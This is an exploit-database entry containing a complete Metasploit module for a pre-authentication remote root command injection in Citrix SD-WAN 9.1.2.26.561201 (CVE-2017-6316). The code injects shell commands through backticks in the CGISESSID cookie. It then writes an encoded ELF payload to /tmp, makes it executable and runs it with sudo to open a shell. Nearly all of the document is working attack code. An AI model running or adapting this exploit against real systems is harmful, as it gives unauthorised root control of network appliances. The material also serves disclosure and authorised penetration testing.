Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)



EKU-ID: 6790 CVE: 2017-6316 OSVDB-ID:
Author: xort Published: 2017-07-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Citix SD-WAN logout cookie preauth Remote Command Injection Vulnerablity
# Date: 02/20/2017
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.citrix.com
# Software Link: https://www.citrix.com/downloads/cloudbridge/
# Version: 9.1.2.26.561201
# Tested on: 9.1.2.26.561201 (OS partition 4.6)
#           
# CVE : (awaiting cve)
 
# vuln: CGISESSID Cookie parameter
#  associated vuln urls:
#                       /global_data/
#           /global_data/headerdata
#           /log
#           /
#           /r9-1-2-26-561201/configuration/
#           /r9-1-2-26-561201/configuration/edit
#           /r9-1-2-26-561201/configuration/www.citrix.com [CGISESSID cookie]
#
# Description PreAuth Remote Root Citrix SD-WAN <= v9.1.2.26.561201. This exploit leverages a command injection bug.
#
# xort @ Critical Start
 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking
    include  Exploit::Remote::Tcp
        include Msf::Exploit::Remote::HttpClient
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Citrix SD-WAN CGISESSID Cookie Remote Root',
                    'Description'    => %q{
                    This module exploits a remote command execution vulnerability in the Citrix SD-WAN Appliace Version <=  v9.1.2.26.561201. The vulnerability exist in a section of the machine's session checking functionality. If the CGISESSID cookie holds shell-command data - it is used in a call to system where input is processed unsanitized.
            },
            'Author'         =>
                [
                    'xort@Critical Start', # vuln + metasploit module
                ],
            'Version'        => '$Revision: 1 $',
            'References'     =>
                [
                    [ 'none', 'none'],
                ],
            'Platform'      => [ 'linux'],
            'Privileged'     => true,
             'Arch'          => [ ARCH_X86 ],
                        'SessionTypes'  => [ 'shell' ],
                'Payload'        =>
                                {
                                  'Compat' =>
                                  {
                                        'ConnectionType' => 'find',
                                  }
                                },
 
            'Targets'        =>
                [
                    ['Linux Universal',
                        {
                                'Arch' => ARCH_X86,
                                'Platform' => 'linux'
                        }
                    ],
                ],
            'DefaultTarget' => 0))
 
            register_options(
                [
                    OptString.new('CMD', [ false, 'Command to execute', "" ]), 
                    Opt::RPORT(443),
                ], self.class)
    end
 
    def run_command(cmd)
 
        vprint_status( "Running Command...\n" )
 
        # send request with payload
        res = send_request_cgi({
            'method' => 'POST',
                        'uri'     => "/global_data/",
            'vars_post' => {
                'action' => 'logout'
            },
                    'headers' => {
                            'Connection' => 'close',
                            'Cookie' => 'CGISESSID=e6f1106605b5e8bee6114a3b5a88c5b4`'+cmd+'`; APNConfigEditorSession=0qnfarge1v62simtqeb300lkc7;',
                        }
 
        })
 
 
        # pause to let things run smoothly
        sleep(2)
 
 
    end
 
    
    def exploit
        # timeout
        timeout = 1550;
 
        # pause to let things run smoothly
        sleep(2)
 
         #if no 'CMD' string - add code for root shell
                if not datastore['CMD'].nil? and not datastore['CMD'].empty?
 
                        cmd = datastore['CMD']
 
                        # Encode cmd payload
 
                        encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')
 
            # upload elf to /tmp/n , chmod +rx /tmp/n , then run /tmp/n (payload)
                        run_command("echo -e #{encoded_cmd}>/tmp/n")
                        run_command("chmod 755 /tmp/n")
                        run_command("sudo /tmp/n")
                else
                        # Encode payload to ELF file for deployment
                        elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
                        encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')
 
            # upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
                        run_command("echo -e #{encoded_elf}>/tmp/m")
                        run_command("chmod 755 /tmp/m")
                        run_command("sudo /tmp/m")
 
            # wait for magic
                        handler
            
                end
 
 
    end
end